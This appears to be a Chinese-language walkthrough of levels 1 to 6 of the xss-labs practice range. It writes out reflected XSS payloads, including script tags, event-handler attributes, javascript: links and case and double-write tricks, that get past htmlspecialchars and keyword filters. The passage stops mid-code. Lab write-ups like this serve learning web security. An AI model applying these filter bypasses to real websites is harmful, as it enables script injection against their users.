xss-maps下载在网上都有然后加上小皮搭建一下就行
1.
首先看http://xss-labs:8001/level1.php?name=test
发现欢迎用户test跟后面赋值name的值是一样的
然后我们就可考虑在上面尝试xss语句
如何判断是否存在xss漏洞,这个要多去观察网站的有用数据,尝试多种方法,来看是否会出现弹窗效果
<script>alert(1)</script>就可以过关


这里还是用两个test字眼跟网站上面的test字眼是一样的,那么修改一下test这个值看看是否会变化,变化的是上面还是下面的test字眼

发现两个都会变化,然后f12看看内容

发现这个input里面是包含了我的lllxxy的,那么就考虑一下闭合这个input语句然后再来添加弹框语句

3.
在页面中没有发现有关wait字眼的东西,还是尝试修改一下wait值然后再去检查一下元素吧
http://xss-labs:8001/level3.php?writing=1

然后点击搜索尝试发现:

尝试上面第二关的方法:
http://xss-labs:8001/level3.php?keyword=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
也没变化f12查看一下尝试看看哪里出现了问题:

发现还是没用查看一下这关的源代码:
str = _GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
发现这里的.htmlspecialchars($str).

然后尝试其他的方法,不带有上面的符号也能进行弹窗的方法
尝试鼠标点击的方法然后进行弹窗这个方法:
基本的鼠标事件Payload
点击事件 (onclick)
" οnclick="alert(1)"
' οnclick='alert(1)'
鼠标悬停事件 (onmouseover)
" οnmοuseοver="alert(1)"
' οnmοuseοver='alert(1)'
鼠标移动事件 (onmousemove)
" οnmοusemοve="alert(1)"
尝试:http://xss-labs:8001/level3.php?keyword=%22οnclick=%22alert(1)

因为:<input name=keyword value='".htmlspecialchars($str)."'>
所以再尝试:
http://xss-labs:8001/level3.php?keyword=%27οnclick=%27alert(1)


修改keyword的值

尝试闭合和" οnclick="alert(1)"
http://xss-labs:8001/level4.php?keyword=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
<input name="keyword" value="

发现下面的等号都没有了
那么再去尝试http://xss-labs:8001/level4.php?keyword=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
改成:" οnclick="alert(1)"
http://xss-labs:8001/level4.php?keyword=%22%3E%20οnclick=%22alert(1)%22


根据上面的思路
"><script>alert(1)</script>
">οnclick="alert(1)"
尝试:

变成了<scr_ipt>alert(1)</script>

发现on变成了o_n那么就要考虑其他的思路,不能用上面的方法
尝试超链接方式点击后跳转那么这个也能实现这个靶场的目的:
基本的超链接Payload
在输入框内插入可点击链接:
http://xss-labs:8001/level3.php?keyword='><a href='#' οnclick='alert(1)'>点击我</a><'
<input value=''><a href='#' οnclick='alert(1)'>点击我</a><''>
带样式的链接(更显眼):
http://xss-labs:8001/level3.php?keyword='><a href='javascript:alert(1)' style='color:red;font-size:20px'>★点击这里★</a><'
2. 使用javascript:伪协议
直接跳转执行:
http://xss-labs:8001/level3.php?keyword='><a href='javascript:alert(1)'>点击执行</a><'
多语句执行:
http://xss-labs:8001/level3.php?keyword='><a href='javascript:alert(1);alert(2)'>点击我</a><'
1.先来尝试简单的
"><a href='#' οnclick='alert(1)'>lllxxy 先闭合然后加上超链接
这个是不行的
2.伪协议
"><a href='javascript:alert(1)'>lllxxy先闭合然后加上超链接
http://xss-labs:8001/level5.php?keyword=%22%3E%3Ca%20href=javascript:alert(1)%3Elllxxy


根据上面的思路
"><script>alert(1)</script>
变成value="<scr_ipt>alert(1)</script>"
">οnclick="alert(1)":value="o_nclick="
"><a href='#' οnclick='alert(1)'>lllxxy 先闭合然后加上超链接
"><a href='javascript:alert(1)'>lllxxy先闭合然后加上超链接
变成:value="<a hr_ef='javascript:alert(1)'>"
尝试大小写双写思路发现可以
然后检查一下源代码:
str = _GET["keyword"];
str2=str_replace("\